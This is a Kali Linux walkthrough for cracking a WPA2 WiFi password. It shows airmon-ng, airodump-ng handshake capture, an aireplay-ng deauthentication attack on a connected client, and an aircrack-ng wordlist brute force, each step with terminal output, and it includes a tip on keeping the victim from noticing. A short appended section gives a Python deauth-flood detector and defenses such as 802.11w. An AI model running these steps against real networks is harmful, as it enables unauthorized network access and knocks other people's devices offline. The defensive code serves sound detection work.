Cracking a WiFi password with Kali
- List the available wireless interface names
airmon-ng
┌──(root💀kali)-[~]
└─# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a)
- Put the interface into monitor mode
airmon-ng start wlan0
┌──(root💀kali)-[~]
└─# airmon-ng start wlan0
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
518 NetworkManager
698 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
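- Run
iwconfig
to view the interface information. If the interface name has gained the mon suffix (wlan0mon), monitor mode was enabled successfully.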
┌──(root💀kali)-[~]
└─# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
- Run
airodump-ng wlan0mon
to scan for WiFi networks. Once the target WiFi shows up, press Ctrl+C to stop the scan.
┌──(root💀kali)-[~]
└─# airodump-ng wlan0mon
CH 6 ][ Elapsed: 6 s ][ 2021-04-23 14:21
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AA:AA:99:CC:2D:C6 -85 2 0 0 11 270 WPA2 CCMP PSK LIN
AA:AA:8C:D2:76:A9 -29 9 0 0 6 180 WPA2 CCMP PSK Huawei
AA:AA:1D:04:29:3B -42 12 0 0 6 540 WPA2 CCMP PSK BoyNextDoor
AA:AA:FC:3C:D1:66 -44 8 11 0 1 270 WPA2 CCMP PSK 2806
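Field | Meaning |
---|---|
BSSID | MAC address of the target WiFi |
PWR | Signal strength of the target WiFi; the smaller the absolute value, the stronger the signal |
#Data | Amount of data; the larger the value, the more people are using the network |
CH | WiFi channel |
ESSID | WiFi name |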
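- Start capturing packets
Run the command airodump-ng --bssid <BSSID> -c <channel> -w <path to store the capture> wlan0mon
to capture packets. When the terminal shows the field WPA handshake:
the capture has succeeded. You can press Ctrl+C to stop capturing and also stop the attack on the client, so that the other side does not notice being knocked offline and unable to connect.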
┌──(root💀kali)-[~]
└─# airodump-ng --bssid AA:AA:8C:D2:76:A9 -c 6 -w /home/kali/Desktop/package wlan0mon
14:25:39 Created capture file "/home/kali/Desktop/package-01.cap".
==Sign of a successful capture==
CH 6 ][ Elapsed: 10 mins ][ 2021-04-23 14:35 ][ WPA handshake: AA:AA:8C:D2:76:A9
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
==MAC address of the WiFi==
AA:AA:8C:D2:76:A9 -25 100 5840 1882 0 6 180 WPA2 CCMP PSK Huawei
BSSID STATION PWR Rate Lost Frames Notes Probes
==MAC address of the WiFi== ==MAC address of the client==
AA:AA:8C:D2:76:A9 AA:AA:E9:78:97:D3 -18 1e- 1e 4844 10655 EAPOL Huawei
Quitting...
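- While the capture is running, open a new terminal and run
aireplay-ng -0 20 -c <MAC address of a client connected to the WiFi> -a <BSSID (MAC address of the WiFi)> wlan0mon
This targets any one client connected to the target WiFi and knocks it offline so that it reconnects and performs the WPA handshake again. Our side poses as the WiFi access point and obtains the packets.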
┌──(root💀kali)-[~]
└─# aireplay-ng -0 20 -a AA:AA:8C:D2:76:A9 -c AA:AA:E9:78:97:D3 wlan0mon
14:39:57 Waiting for beacon frame (BSSID: 24:6F:8C:D2:76:A9) on channel 6
14:39:57 Sending 64 directed DeAuth (code 7). STMAC: [AA:AA:E9:78:97:D3] [22|226 ACKs]
14:39:58 Sending 64 directed DeAuth (code 7). STMAC: [AA:AA:E9:78:97:D3] [ 0|300 ACKs]
14:39:59 Sending 64 directed DeAuth (code 7). STMAC: [AA:AA:E9:78:97:D3] [ 0|300 ACKs]
14:40:00 Sending 64 directed DeAuth (code 7). STMAC: [AA:AA:E9:78:97:D3] [ 0|598 ACKs]
14:4^C00 Sending 64 directed DeAuth (code 7). STMAC: [AA:AA:E9:78:97:D3] [ 0|163 ACKs]
- After the capture is complete, turn off monitor mode on the interface
airmon-ng stop wlan0mon
- Brute-force the password
Run aircrack-ng -w <wordlist path> <handshake capture path>
to start cracking
┌──(root💀kali)-[~]
└─# aircrack-ng -w /home/kali/Desktop/wordlists/rockyou.txt /home/kali/Desktop/*.cap
Reading packets, please wait...
Opening /home/kali/Desktop/package-01.cap
Read 103829 packets.
# BSSID ESSID Encryption
1 AA:AA:8C:D2:76:A9 Huawei WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening /home/kali/Desktop/package-01.cap
Read 103829 packets.
1 potential targets
Aircrack-ng 1.6
[00:00:00] 119/10303727 keys tested (2500.73 k/s)
Time left: 1 hour, 8 minutes, 41 seconds 0.00%
KEY FOUND! [ 12345678 ] (this is the password)
Master Key : 32 68 BE DA 0E 67 5D 2D 22 D0 B8 65 44 0B BB 61
08 F9 58 57 44 3C B6 1B EC F7 88 21 25 A6 BC 79
Transient Key : EA 80 60 7A 52 D2 94 C0 20 96 FE 8B 00 D7 80 F9
74 A6 DC 22 94 97 C8 33 8B 0A C6 C9 17 99 AC A9
93 C0 7A 2D D5 A3 B2 C1 D7 D9 BD 55 D1 31 20 E5
4F BE 50 E6 E0 B0 A3 4C 1B 83 BC B3 AE 00 00 00
EAPOL HMAC : E0 69 F2 EB 1C 23 37 C1 38 53 8E 06 BA 98 89 12
Q: How do I get the rockyou.txt wordlist?
A: Kali ships with the rockyou.txt wordlist in the /usr/share/wordlists directory.
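Seen from the network owner's side, the aireplay-ng step above shows up on the air as dense bursts of deauthentication frames (reason code 7) aimed at one client. The following is an added example, not part of the original page: a sliding-window detector run over a constructed frame log. The record format, the one-second window and the threshold of 30 are assumptions; the MAC addresses are the masked ones from the output above.

```python
from collections import defaultdict, deque

WINDOW_S = 1.0   # assumed sliding window, in seconds
THRESHOLD = 30   # assumed: deauth frames per window that count as a flood

def parse(line):
    """Parse one constructed record: '<epoch> <subtype> <src> <dst> <reason>'."""
    ts, subtype, src, dst, reason = line.split()
    return float(ts), subtype, src.lower(), dst.lower(), int(reason)

def detect_deauth_floods(lines, window=WINDOW_S, threshold=THRESHOLD):
    """Return sorted (src, dst, peak_count) for every source/destination pair
    whose deauth frame count inside any window reaches the threshold."""
    recent = defaultdict(deque)   # (src, dst) -> timestamps still inside the window
    peaks = {}
    for line in lines:
        ts, subtype, src, dst, _reason = parse(line)
        if subtype != "deauth":
            continue
        q = recent[(src, dst)]
        q.append(ts)
        while ts - q[0] > window:   # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            peaks[(src, dst)] = max(peaks.get((src, dst), 0), len(q))
    return sorted((s, d, n) for (s, d), n in peaks.items())

# Constructed sample: one burst of 64 directed deauths in under a second
# (the burst size aireplay-ng reports), then a lone deauth and a beacon.
AP, STA = "aa:aa:8c:d2:76:a9", "aa:aa:e9:78:97:d3"
SAMPLE = [f"{1000 + i * 0.01:.2f} deauth {AP} {STA} 7" for i in range(64)]
SAMPLE += [
    "1005.00 deauth aa:aa:1d:04:29:3b aa:aa:00:00:00:01 3",   # single, benign
    "1005.10 beacon aa:aa:1d:04:29:3b ff:ff:ff:ff:ff:ff 0",
]

if __name__ == "__main__":
    for src, dst, peak in detect_deauth_floods(SAMPLE):
        print(f"deauth flood: {src} -> {dst}, peak {peak} frames per {WINDOW_S}s")
```

Detection only tells you it happened. Enabling 802.11w Protected Management Frames (mandatory in WPA3) makes clients ignore forged deauthentication frames, and a long passphrase that appears in no wordlist is what defeats the dictionary step.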